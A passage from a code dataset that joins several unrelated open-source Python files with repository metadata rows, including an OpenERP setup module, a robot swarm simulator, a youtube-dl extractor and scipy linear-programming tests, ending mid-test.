except:
print 'Given directory does not contain edi files: {0}'.format(edidir)
outputdir = op.join(edidir,'decimal_degrees')
if not op.isdir(outputdir):
os.makedirs(outputdir)
if len(sys.argv) > 2:
outputdir = sys.argv[2]
try:
if not op.isdir(outputdir):
os.makedirs(outputdir)
except:
print 'could not generate output directory - using default'
outputdir = op.join(edidir,'decimal_degrees')
if not op.isdir(outputdir):
os.makedirs(outputdir)
path = convert_edis(edilist,outputdir)
return path
def convert_edis(edilist, output_path):
for edi in edilist:
infile = edi
outfile_raw = os.path.split(edi)[1]
outfile = op.join(output_path, outfile_raw)
outstring =''
with open(infile,'r') as F:
edilines = F.readlines()
for line in edilines:
if not ('lat' in line.lower() or 'lon' in line.lower()):
outstring += line
continue
linelist = line.strip().split('=')
coord = linelist[1]
dec_coord = str(MTft.assert_decimal_coordinates(coord))
outstring += '\t{0}={1}\t\n'.format(linelist[0],dec_coord)
with open(outfile,'w') as Fout:
Fout.write(outstring.expandtabs(4))
if __name__=='__main__':
main()
| gpl-3.0 | 1,244,499,688,286,023,000 | 24.816327 | 81 | 0.580632 | false |
Jgarcia-IAS/SAT | openerp/addons/base_setup/base_setup.py | 382 | 5430 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import simplejson
import cgi
from openerp import tools
from openerp.osv import fields, osv
from openerp.tools.translate import _
from lxml import etree
# Specify Your Terminology will move to 'partner' module
class specify_partner_terminology(osv.osv_memory):
_name = 'base.setup.terminology'
_inherit = 'res.config'
_columns = {
'partner': fields.selection([
('Customer','Customer'),
('Client','Client'),
('Member','Member'),
('Patient','Patient'),
('Partner','Partner'),
('Donor','Donor'),
('Guest','Guest'),
('Tenant','Tenant')
], 'How do you call a Customer', required=True ),
}
_defaults={
'partner' :'Customer',
}
def make_translations(self, cr, uid, ids, name, type, src, value, res_id=0, context=None):
trans_obj = self.pool.get('ir.translation')
user_obj = self.pool.get('res.users')
context_lang = user_obj.browse(cr, uid, uid, context=context).lang
existing_trans_ids = trans_obj.search(cr, uid, [('name','=',name), ('lang','=',context_lang), ('type','=',type), ('src','=',src), ('res_id','=',res_id)])
if existing_trans_ids:
trans_obj.write(cr, uid, existing_trans_ids, {'value': value}, context=context)
else:
create_id = trans_obj.create(cr, uid, {'name': name,'lang': context_lang, 'type': type, 'src': src, 'value': value , 'res_id': res_id}, context=context)
return {}
def execute(self, cr, uid, ids, context=None):
def _case_insensitive_replace(ref_string, src, value):
import re
pattern = re.compile(src, re.IGNORECASE)
return pattern.sub(_(value), _(ref_string))
trans_obj = self.pool.get('ir.translation')
fields_obj = self.pool.get('ir.model.fields')
menu_obj = self.pool.get('ir.ui.menu')
act_window_obj = self.pool.get('ir.actions.act_window')
for o in self.browse(cr, uid, ids, context=context):
#translate label of field
field_ids = fields_obj.search(cr, uid, [('field_description','ilike','Customer')])
for f_id in fields_obj.browse(cr ,uid, field_ids, context=context):
field_ref = f_id.model_id.model + ',' + f_id.name
self.make_translations(cr, uid, ids, field_ref, 'field', f_id.field_description, _case_insensitive_replace(f_id.field_description,'Customer',o.partner), context=context)
#translate help tooltip of field
for obj in self.pool.models.values():
for field_name, field_rec in obj._columns.items():
if field_rec.help.lower().count('customer'):
field_ref = obj._name + ',' + field_name
self.make_translations(cr, uid, ids, field_ref, 'help', field_rec.help, _case_insensitive_replace(field_rec.help,'Customer',o.partner), context=context)
#translate menuitems
menu_ids = menu_obj.search(cr,uid, [('name','ilike','Customer')])
for m_id in menu_obj.browse(cr, uid, menu_ids, context=context):
menu_name = m_id.name
menu_ref = 'ir.ui.menu' + ',' + 'name'
self.make_translations(cr, uid, ids, menu_ref, 'model', menu_name, _case_insensitive_replace(menu_name,'Customer',o.partner), res_id=m_id.id, context=context)
#translate act window name
act_window_ids = act_window_obj.search(cr, uid, [('name','ilike','Customer')])
for act_id in act_window_obj.browse(cr ,uid, act_window_ids, context=context):
act_ref = 'ir.actions.act_window' + ',' + 'name'
self.make_translations(cr, uid, ids, act_ref, 'model', act_id.name, _case_insensitive_replace(act_id.name,'Customer',o.partner), res_id=act_id.id, context=context)
#translate act window tooltips
act_window_ids = act_window_obj.search(cr, uid, [('help','ilike','Customer')])
for act_id in act_window_obj.browse(cr ,uid, act_window_ids, context=context):
act_ref = 'ir.actions.act_window' + ',' + 'help'
self.make_translations(cr, uid, ids, act_ref, 'model', act_id.help, _case_insensitive_replace(act_id.help,'Customer',o.partner), res_id=act_id.id, context=context)
return {}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -1,916,442,078,377,144,600 | 53.848485 | 185 | 0.592081 | false |
beckynaylor/PiSwarmSim | PiSwarmSimulator/arena.py | 1 | 5901 | # Pi-Swarm Simulator is a simple graphical simulation environment for the Pi-Swarm robots
# Copyright (C) 2014 Becky Naylor, Jon Timmis, University of York
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#All arena element classes are in this file
#import external libraries
import os, random, sys, math, itertools, operator, datetime, re, cProfile
from framework import *
#import simulator classes
from robot import *
from proxSensor import *
#Room perimeter polygon, currently there should be just one of these
class Room():
def __init__(self, world, xsize, ysize):
self.xsize = xsize
self.ysize = ysize
#TODO: make centre relative to the screen, not hardcoded
#Centre the room in the screen
self.centrePoint = (0,ysize/2)
self.walls = world.CreateBody(position=self.centrePoint, userData=self)
#List of corner positions to create edges
self.corners = [ (-xsize/2,-ysize/2),
(-xsize/2,ysize/2),
(xsize/2,ysize/2),
(xsize/2,-ysize/2),
(-xsize/2,-ysize/2) ]
#Make vertices
self.walls.CreateEdgeChain(self.corners)
#Arena obstacles, provide the world to add them to. Can also provide a list of protected areas (of type b2body)
class Obstacle:
def __init__(self, world, obstacleid, room, protectedAreaList=0):
self.obstacleid = obstacleid
self.shape = ""
#Pick random size
obs_size = random.uniform(0.5,1.5)
#Dice roll to decide object shape
diceroll = random.randint(0,2)
roomx = room.xsize
roomy = room.ysize
#square
if diceroll == 0:
self.shape = "square"
obs_y_size = obs_size
obstacle=b2PolygonShape(box=(obs_size, obs_size))
self.size = obs_size
#rectangle
elif diceroll == 1:
self.shape = "rectangle"
#generate y side too for rectangle
obs_y_size = random.uniform(0.5,1.5)
obstacle=b2PolygonShape(box=(obs_size, obs_y_size))
self.size = (obs_size, obs_y_size)
#circle
elif diceroll == 2:
self.shape = "circle"
obs_size = obs_size*2
obs_y_size = obs_size
obstacle=b2CircleShape(radius=(obs_size))
self.size = obs_size
positionAccepted = False
while positionAccepted == False:
#Pick random co-ordinates
(xpos, ypos) = (random.uniform(-(float(roomx)/2)+obs_size,(float(roomx)/2)-obs_size), random.uniform(0+obs_y_size,roomy-obs_y_size))
self.fixtures = b2FixtureDef(shape=obstacle, density=1, friction=0.3)
self.body = world.CreateStaticBody(position=(xpos,ypos), fixtures=self.fixtures, userData=self)
#Check there are no protected areas e.g. powersockets at this point
if protectedAreaList != 0:
positionAccepted = True
for protArea in protectedAreaList:
overlapping = b2TestOverlap(self.fixtures.shape, 0, protArea.fixtures.shape, 0, self.body.transform, protArea.body.transform);
#If the shape overlaps a protected area then we need to generate new coordinates
if overlapping == True:
positionAccepted = False
#Destroy old shape before creating a new one
if positionAccepted == False:
world.DestroyBody(self.body)
#Floor area where the robots recharge, specified size (x,y) and position (x,y)
class PowerStrip:
def __init__(self, world, powerid, room, position="none", size="none"):
roomx = room.xsize
roomy = room.ysize
if size == "none":
size = (1.5,1.5)
if position == "none":
#position = ((roomx/2)-size[0],roomy-size[1])
position = (-(roomx/2)+size[0],roomy-size[1])
#with size (3,2) and room (40,40) xpos = -17 and ypos = 2 is bottom left
#with size (3,2) and room (40,40) xpos = -17 and ypos = 38 is top left
#with size (3,2) and room (40,40) xpos = 17 and ypos = 38 is top right
self.powerid = powerid
self.size = size
powerstrip=b2PolygonShape(box=self.size)
self.fixtures = b2FixtureDef(shape=powerstrip, density=0, friction=0, isSensor=True, userData=self)
self.body = world.CreateStaticBody(position=position, fixtures=self.fixtures)
#Floor tile of specified size (x,y) and position (x,y)
class FloorTile:
def __init__(self, world, position, size):
self.contacted = False
#pygame seems to double the expected size, so (4.0,4.0) has 4.0 above centre point and 4.0 below - so halve it.
size = (size[0]/2,size[1]/2)
floortile=b2PolygonShape(box=size)
self.fixtures = b2FixtureDef(shape=floortile, density=0, friction=0, isSensor=True, userData=self)
self.body = world.CreateStaticBody(position=position, fixtures=self.fixtures)
| gpl-3.0 | -4,093,277,932,417,575,400 | 39.979167 | 146 | 0.601423 | false |
hickerson/bbn | fable/fable_sources/libtbx/command_line/run_tests_parallel.py | 1 | 3187 | from __future__ import division
import libtbx.test_utils.parallel
from libtbx.utils import Sorry, Usage
import libtbx.phil
import random
import os
import sys
master_phil = libtbx.phil.parse("""
directory = None
.type = path
.multiple = True
module = None
.type = str
.multiple = True
nproc = 1
.type= int
shuffle = False
.type = bool
quiet = False
.type = bool
run_in_tmp_dir = False
.type = bool
output_junit_xml = False
.type = bool
.help = "Create junit-style xml output"
"Requires junit_xml module:"
" https://pypi.python.org/pypi/junit-xml"
""")
def run (args) :
if (len(args) == 0) :
raise Usage("""libtbx.run_tests_parallel [module=NAME] [directory=path]""")
user_phil = []
for arg in args :
if os.path.isdir(arg) :
user_phil.append(libtbx.phil.parse("directory=%s" % arg))
else :
try :
arg_phil = libtbx.phil.parse(arg)
except RuntimeError :
raise Sorry("Unrecognized argument '%s'" % arg)
else :
user_phil.append(arg_phil)
params = master_phil.fetch(sources=user_phil).extract()
if params.run_in_tmp_dir:
import tempfile
run_dir = tempfile.mkdtemp(suffix='', prefix='cctbxtst')
print 'Running tests in %s' % run_dir
os.chdir(run_dir)
else:
cwd = os.getcwd()
cwd_files = os.listdir(cwd)
if (len(cwd_files) > 0) :
raise Sorry("Please run this program in an empty directory.")
if params.output_junit_xml:
try:
import junit_xml
except ImportError, e:
raise Sorry(
"Cannot import junit_xml. Try running with output_junit_xml=False")
if (len(params.directory) == 0) and (len(params.module) == 0) :
raise Sorry("Please specify modules and/or directories to test.")
all_tests = []
for dir_name in params.directory :
if os.path.split(dir_name)[-1].find("cctbx_project")>-1:
print 'DANGER '*10
print 'Using the directory option in cctbx_project can be very time consuming'
print 'DANGER '*10
dir_tests = libtbx.test_utils.parallel.find_tests(dir_name)
all_tests.extend(libtbx.test_utils.parallel.make_commands(dir_tests))
for module_name in params.module :
module_tests = libtbx.test_utils.parallel.get_module_tests(module_name)
all_tests.extend(module_tests)
if (len(all_tests) == 0) :
raise Sorry("No test scripts found in %s." % params.directory)
if (params.shuffle) :
random.shuffle(all_tests)
if (not params.quiet) :
print "Running the following %d tests on %d processors:" % (len(all_tests),
params.nproc)
for test in all_tests :
print " " + test
log = open("zlog", "wb")
libtbx.test_utils.parallel.run_command_list(
cmd_list=all_tests,
nprocs=params.nproc,
log=log,
quiet=params.quiet,
output_junit_xml=params.output_junit_xml)
log.close()
print """
============================================================================
Reminder: Please do not forget: libtbx.find_clutter
See also: cctbx_project/libtbx/development/dev_guidelines.txt
============================================================================
"""
if (__name__ == "__main__") :
run(sys.argv[1:])
| mit | -7,499,863,496,812,789,000 | 29.352381 | 84 | 0.618764 | false |
Petraea/jsonbot | jsb/utils/pdod.py | 1 | 1417 | # gozerbot/pdod.py
#
#
""" pickled dicts of dicts """
## jsb imports
from jsb.utils.lazydict import LazyDict
from jsb.lib.persist import Persist
## Pdod class
class Pdod(Persist):
""" pickled dicts of dicts """
def __getitem__(self, name):
""" return item with name """
if self.data.has_key(name): return self.data[name]
def __delitem__(self, name):
""" delete name item """
if self.data.has_key(name): return self.data.__delitem__(name)
def __setitem__(self, name, item):
""" set name item """
self.data[name] = item
def __contains__(self, name):
return self.data.__contains__(name)
def setdefault(self, name, default):
""" set default of name """
return self.data.setdefault(name, default)
def has_key(self, name):
""" has name key """
return self.data.has_key(name)
def has_key2(self, name1, najsb):
""" has [name1][najsb] key """
if self.data.has_key(name1): return self.data[name1].has_key(najsb)
def get(self, name1, najsb):
""" get data[name1][najsb] """
try:
result = self.data[name1][najsb]
return result
except KeyError: pass
def set(self, name1, najsb, item):
""" set name, najsb item """
if not self.data.has_key(name1): self.data[name1] = {}
self.data[name1][najsb] = item
| mit | 5,943,566,296,325,826,000 | 24.763636 | 75 | 0.57163 | false |
Nikoli/youtube-dl | youtube_dl/extractor/ultimedia.py | 2 | 3512 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
ExtractorError,
qualities,
unified_strdate,
clean_html,
)
class UltimediaIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?ultimedia\.com/default/index/video[^/]+/id/(?P<id>[\d+a-z]+)'
_TESTS = [{
# news
'url': 'https://www.ultimedia.com/default/index/videogeneric/id/s8uk0r',
'md5': '276a0e49de58c7e85d32b057837952a2',
'info_dict': {
'id': 's8uk0r',
'ext': 'mp4',
'title': 'Loi sur la fin de vie: le texte prรฉvoit un renforcement des directives anticipรฉes',
'description': 'md5:3e5c8fd65791487333dda5db8aed32af',
'thumbnail': 're:^https?://.*\.jpg',
'upload_date': '20150317',
},
}, {
# music
'url': 'https://www.ultimedia.com/default/index/videomusic/id/xvpfp8',
'md5': '2ea3513813cf230605c7e2ffe7eca61c',
'info_dict': {
'id': 'xvpfp8',
'ext': 'mp4',
'title': "Two - C'est la vie (Clip)",
'description': 'Two',
'thumbnail': 're:^https?://.*\.jpg',
'upload_date': '20150224',
},
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
deliver_url = self._search_regex(
r'<iframe[^>]+src="(https?://(?:www\.)?ultimedia\.com/deliver/[^"]+)"',
webpage, 'deliver URL')
deliver_page = self._download_webpage(
deliver_url, video_id, 'Downloading iframe page')
if '>This video is currently not available' in deliver_page:
raise ExtractorError(
'Video %s is currently not available' % video_id, expected=True)
player = self._parse_json(
self._search_regex(
r"jwplayer\('player(?:_temp)?'\)\.setup\(({.+?})\)\.on", deliver_page, 'player'),
video_id)
quality = qualities(['flash', 'html5'])
formats = []
for mode in player['modes']:
video_url = mode.get('config', {}).get('file')
if not video_url:
continue
if re.match(r'https?://www\.youtube\.com/.+?', video_url):
return self.url_result(video_url, 'Youtube')
formats.append({
'url': video_url,
'format_id': mode.get('type'),
'quality': quality(mode.get('type')),
})
self._sort_formats(formats)
thumbnail = player.get('image')
title = clean_html((
self._html_search_regex(
r'(?s)<div\s+id="catArticle">.+?</div>(.+?)</h1>',
webpage, 'title', default=None) or
self._search_regex(
r"var\s+nameVideo\s*=\s*'([^']+)'",
deliver_page, 'title')))
description = clean_html(self._html_search_regex(
r'(?s)<span>Description</span>(.+?)</p>', webpage,
'description', fatal=False))
upload_date = unified_strdate(self._search_regex(
r'Ajoutรฉ le\s*<span>([^<]+)', webpage,
'upload date', fatal=False))
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'upload_date': upload_date,
'formats': formats,
}
| unlicense | 6,590,264,584,309,799,000 | 33.067961 | 105 | 0.509832 | false |
jor-/scipy | scipy/optimize/tests/test_linprog.py | 2 | 69667 | """
Unit test for Linear Programming
"""
from __future__ import division, print_function, absolute_import
import sys
import numpy as np
from numpy.testing import (assert_, assert_allclose, assert_equal,
assert_array_less)
from pytest import raises as assert_raises
from scipy.optimize import linprog, OptimizeWarning
from scipy._lib._numpy_compat import _assert_warns, suppress_warnings
from scipy.sparse.linalg import MatrixRankWarning
from scipy.linalg import LinAlgWarning
import pytest
has_umfpack = True
try:
from scikits.umfpack import UmfpackWarning
except ImportError:
has_umfpack = False
has_cholmod = True
try:
import sksparse
except ImportError:
has_cholmod = False
def _assert_iteration_limit_reached(res, maxiter):
assert_(not res.success, "Incorrectly reported success")
assert_(res.success < maxiter, "Incorrectly reported number of iterations")
assert_equal(res.status, 1, "Failed to report iteration limit reached")
def _assert_infeasible(res):
# res: linprog result object
assert_(not res.success, "incorrectly reported success")
assert_equal(res.status, 2, "failed to report infeasible status")
def _assert_unbounded(res):
# res: linprog result object
assert_(not res.success, "incorrectly reported success")
assert_equal(res.status, 3, "failed to report unbounded status")
def _assert_unable_to_find_basic_feasible_sol(res):
# res: linprog result object
# The status may be either 2 or 4 depending on why the feasible solution
# could not be found. If the undelying problem is expected to not have a
# feasible solution _assert_infeasible should be used.
assert_(not res.success, "incorrectly reported success")
assert_(res.status in (2, 4), "failed to report optimization failure")
def _assert_success(res, desired_fun=None, desired_x=None,
rtol=1e-8, atol=1e-8):
# res: linprog result object
# desired_fun: desired objective function value or None
# desired_x: desired solution or None
if not res.success:
msg = "linprog status {0}, message: {1}".format(res.status,
res.message)
raise AssertionError(msg)
assert_equal(res.status, 0)
if desired_fun is not None:
assert_allclose(res.fun, desired_fun,
err_msg="converged to an unexpected objective value",
rtol=rtol, atol=atol)
if desired_x is not None:
assert_allclose(res.x, desired_x,
err_msg="converged to an unexpected solution",
rtol=rtol, atol=atol)
def magic_square(n):
"""
Generates a linear program for which integer solutions represent an
n x n magic square; binary decision variables represent the presence
(or absence) of an integer 1 to n^2 in each position of the square.
"""
np.random.seed(0)
M = n * (n**2 + 1) / 2
numbers = np.arange(n**4) // n**2 + 1
numbers = numbers.reshape(n**2, n, n)
zeros = np.zeros((n**2, n, n))
A_list = []
b_list = []
# Rule 1: use every number exactly once
for i in range(n**2):
A_row = zeros.copy()
A_row[i, :, :] = 1
A_list.append(A_row.flatten())
b_list.append(1)
# Rule 2: Only one number per square
for i in range(n):
for j in range(n):
A_row = zeros.copy()
A_row[:, i, j] = 1
A_list.append(A_row.flatten())
b_list.append(1)
# Rule 3: sum of rows is M
for i in range(n):
A_row = zeros.copy()
A_row[:, i, :] = numbers[:, i, :]
A_list.append(A_row.flatten())
b_list.append(M)
# Rule 4: sum of columns is M
for i in range(n):
A_row = zeros.copy()
A_row[:, :, i] = numbers[:, :, i]
A_list.append(A_row.flatten())
b_list.append(M)
# Rule 5: sum of diagonals is M
A_row = zeros.copy()
A_row[:, range(n), range(n)] = numbers[:, range(n), range(n)]
A_list.append(A_row.flatten())
b_list.append(M)
A_row = zeros.copy()
A_row[:, range(n), range(-1, -n - 1, -1)] = \
numbers[:, range(n), range(-1, -n - 1, -1)]
A_list.append(A_row.flatten())
b_list.append(M)
A = np.array(np.vstack(A_list), dtype=float)
b = np.array(b_list, dtype=float)
c = np.random.rand(A.shape[1])
return A, b, c, numbers
def lpgen_2d(m, n):
""" -> A b c LP test: m*n vars, m+n constraints
row sums == n/m, col sums == 1
https://gist.github.com/denis-bz/8647461
"""
np.random.seed(0)
c = - np.random.exponential(size=(m, n))
Arow = np.zeros((m, m * n))
brow = np.zeros(m)
for j in range(m):
j1 = j + 1
Arow[j, j * n:j1 * n] = 1
brow[j] = n / m
Acol = np.zeros((n, m * n))
bcol = np.zeros(n)
for j in range(n):
j1 = j + 1
Acol[j, j::n] = 1
bcol[j] = 1
A = np.vstack((Arow, Acol))
b = np.hstack((brow, bcol))
return A, b, c.ravel()
def nontrivial_problem():
c = [-1, 8, 4, -6]
A_ub = [[-7, -7, 6, 9],
[1, -1, -3, 0],
[10, -10, -7, 7],
[6, -1, 3, 4]]
b_ub = [-3, 6, -6, 6]
A_eq = [[-10, 1, 1, -8]]
b_eq = [-4]
x_star = [101 / 1391, 1462 / 1391, 0, 752 / 1391]
f_star = 7083 / 1391
return c, A_ub, b_ub, A_eq, b_eq, x_star, f_star
def generic_callback_test(self):
# Check that callback is as advertised
last_cb = {}
def cb(res):
message = res.pop('message')
complete = res.pop('complete')
assert_(res.pop('phase') in (1, 2))
assert_(res.pop('status') in range(4))
assert_(isinstance(res.pop('nit'), int))
assert_(isinstance(complete, bool))
assert_(isinstance(message, str))
last_cb['x'] = res['x']
last_cb['fun'] = res['fun']
last_cb['slack'] = res['slack']
last_cb['con'] = res['con']
c = np.array([-3, -2])
A_ub = [[2, 1], [1, 1], [1, 0]]
b_ub = [10, 8, 4]
res = linprog(c, A_ub=A_ub, b_ub=b_ub, callback=cb, method=self.method)
_assert_success(res, desired_fun=-18.0, desired_x=[2, 6])
assert_allclose(last_cb['fun'], res['fun'])
assert_allclose(last_cb['x'], res['x'])
assert_allclose(last_cb['con'], res['con'])
assert_allclose(last_cb['slack'], res['slack'])
def test_unknown_solver():
c = np.array([-3, -2])
A_ub = [[2, 1], [1, 1], [1, 0]]
b_ub = [10, 8, 4]
assert_raises(ValueError, linprog,
c, A_ub=A_ub, b_ub=b_ub, method='ekki-ekki-ekki')
A_ub = None
b_ub = None
A_eq = None
b_eq = None
bounds = None
################
# Common Tests #
################
class LinprogCommonTests(object):
"""
Base class for `linprog` tests. Generally, each test will be performed
once for every derived class of LinprogCommonTests, each of which will
typically change self.options and/or self.method. Effectively, these tests
are run for many combination of method (simplex, revised simplex, and
interior point) and options (such as pivoting rule or sparse treatment).
"""
##################
# Targeted Tests #
##################
def test_callback(self):
generic_callback_test(self)
def test_disp(self):
# test that display option does not break anything.
A, b, c = lpgen_2d(20, 20)
res = linprog(c, A_ub=A, b_ub=b, method=self.method,
options={"disp": True})
_assert_success(res, desired_fun=-64.049494229)
def test_docstring_example(self):
# Example from linprog docstring.
c = [-1, 4]
A = [[-3, 1], [1, 2]]
b = [6, 4]
x0_bounds = (None, None)
x1_bounds = (-3, None)
res = linprog(c, A_ub=A, b_ub=b, bounds=(x0_bounds, x1_bounds),
options=self.options, method=self.method)
_assert_success(res, desired_fun=-22)
def test_type_error(self):
# (presumably) checks that linprog recognizes type errors
# This is tested more carefully in test__linprog_clean_inputs.py
c = [1]
A_eq = [[1]]
b_eq = "hello"
assert_raises(TypeError, linprog,
c, A_eq=A_eq, b_eq=b_eq,
method=self.method, options=self.options)
def test_aliasing_b_ub(self):
# (presumably) checks that linprog does not modify b_ub
# This is tested more carefully in test__linprog_clean_inputs.py
c = np.array([1.0])
A_ub = np.array([[1.0]])
b_ub_orig = np.array([3.0])
b_ub = b_ub_orig.copy()
bounds = (-4.0, np.inf)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-4, desired_x=[-4])
assert_allclose(b_ub_orig, b_ub)
def test_aliasing_b_eq(self):
# (presumably) checks that linprog does not modify b_eq
# This is tested more carefully in test__linprog_clean_inputs.py
c = np.array([1.0])
A_eq = np.array([[1.0]])
b_eq_orig = np.array([3.0])
b_eq = b_eq_orig.copy()
bounds = (-4.0, np.inf)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=3, desired_x=[3])
assert_allclose(b_eq_orig, b_eq)
def test_non_ndarray_args(self):
# (presumably) checks that linprog accepts list in place of arrays
# This is tested more carefully in test__linprog_clean_inputs.py
c = [1.0]
A_ub = [[1.0]]
b_ub = [3.0]
A_eq = [[1.0]]
b_eq = [2.0]
bounds = (-1.0, 10.0)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=2, desired_x=[2])
def test_unknown_options(self):
c = np.array([-3, -2])
A_ub = [[2, 1], [1, 1], [1, 0]]
b_ub = [10, 8, 4]
def f(c, A_ub=None, b_ub=None, A_eq=None,
b_eq=None, bounds=None, options={}):
linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=options)
o = {key: self.options[key] for key in self.options}
o['spam'] = 42
_assert_warns(OptimizeWarning, f,
c, A_ub=A_ub, b_ub=b_ub, options=o)
def test_invalid_inputs(self):
def f(c, A_ub=None, b_ub=None, A_eq=None, b_eq=None, bounds=None):
linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
for bad_bound in [[(5, 0), (1, 2), (3, 4)],
[(1, 2), (3, 4)],
[(1, 2), (3, 4), (3, 4, 5)],
[(1, 2), (np.inf, np.inf), (3, 4)],
[(1, 2), (-np.inf, -np.inf), (3, 4)],
]:
assert_raises(ValueError, f, [1, 2, 3], bounds=bad_bound)
assert_raises(ValueError, f, [1, 2], A_ub=[[1, 2]], b_ub=[1, 2])
assert_raises(ValueError, f, [1, 2], A_ub=[[1]], b_ub=[1])
assert_raises(ValueError, f, [1, 2], A_eq=[[1, 2]], b_eq=[1, 2])
assert_raises(ValueError, f, [1, 2], A_eq=[[1]], b_eq=[1])
assert_raises(ValueError, f, [1, 2], A_eq=[1], b_eq=1)
# this last check doesn't make sense for sparse presolve
if ("_sparse_presolve" in self.options and
self.options["_sparse_presolve"]):
return
# there aren't 3D sparse matrices
assert_raises(ValueError, f, [1, 2], A_ub=np.zeros((1, 1, 3)), b_eq=1)
def test_empty_constraint_1(self):
c = [-1, -2]
res = linprog(c, method=self.method, options=self.options)
_assert_unbounded(res)
def test_empty_constraint_2(self):
c = [-1, 1, -1, 1]
bounds = [(0, np.inf), (-np.inf, 0), (-1, 1), (-1, 1)]
res = linprog(c, bounds=bounds,
method=self.method, options=self.options)
_assert_unbounded(res)
# Unboundedness detected in presolve requires no iterations
if self.options.get('presolve', True):
assert_equal(res.nit, 0)
def test_empty_constraint_3(self):
c = [1, -1, 1, -1]
bounds = [(0, np.inf), (-np.inf, 0), (-1, 1), (-1, 1)]
res = linprog(c, bounds=bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[0, 0, -1, 1], desired_fun=-2)
def test_inequality_constraints(self):
# Minimize linear function subject to linear inequality constraints.
# http://www.dam.brown.edu/people/huiwang/classes/am121/Archive/simplex_121_c.pdf
c = np.array([3, 2]) * -1 # maximize
A_ub = [[2, 1],
[1, 1],
[1, 0]]
b_ub = [10, 8, 4]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-18, desired_x=[2, 6])
def test_inequality_constraints2(self):
# Minimize linear function subject to linear inequality constraints.
# http://www.statslab.cam.ac.uk/~ff271/teaching/opt/notes/notes8.pdf
# (dead link)
c = [6, 3]
A_ub = [[0, 3],
[-1, -1],
[-2, 1]]
b_ub = [2, -1, -1]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=5, desired_x=[2 / 3, 1 / 3])
def test_bounds_simple(self):
c = [1, 2]
bounds = (1, 2)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[1, 1])
bounds = [(1, 2), (1, 2)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[1, 1])
def test_bounded_below_only_1(self):
c = np.array([1.0])
A_eq = np.array([[1.0]])
b_eq = np.array([3.0])
bounds = (1.0, None)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=3, desired_x=[3])
def test_bounded_below_only_2(self):
c = np.ones(3)
A_eq = np.eye(3)
b_eq = np.array([1, 2, 3])
bounds = (0.5, np.inf)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=b_eq, desired_fun=np.sum(b_eq))
def test_bounded_above_only_1(self):
c = np.array([1.0])
A_eq = np.array([[1.0]])
b_eq = np.array([3.0])
bounds = (None, 10.0)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=3, desired_x=[3])
def test_bounded_above_only_2(self):
c = np.ones(3)
A_eq = np.eye(3)
b_eq = np.array([1, 2, 3])
bounds = (-np.inf, 4)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=b_eq, desired_fun=np.sum(b_eq))
def test_bounds_infinity(self):
c = np.ones(3)
A_eq = np.eye(3)
b_eq = np.array([1, 2, 3])
bounds = (-np.inf, np.inf)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=b_eq, desired_fun=np.sum(b_eq))
def test_bounds_mixed(self):
# Problem has one unbounded variable and
# another with a negative lower bound.
c = np.array([-1, 4]) * -1 # maximize
A_ub = np.array([[-3, 1],
[1, 2]], dtype=np.float64)
b_ub = [6, 4]
x0_bounds = (-np.inf, np.inf)
x1_bounds = (-3, np.inf)
bounds = (x0_bounds, x1_bounds)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-80 / 7, desired_x=[-8 / 7, 18 / 7])
def test_bounds_equal_but_infeasible(self):
c = [-4, 1]
A_ub = [[7, -2], [0, 1], [2, -2]]
b_ub = [14, 0, 3]
bounds = [(2, 2), (0, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
def test_bounds_equal_but_infeasible2(self):
c = [-4, 1]
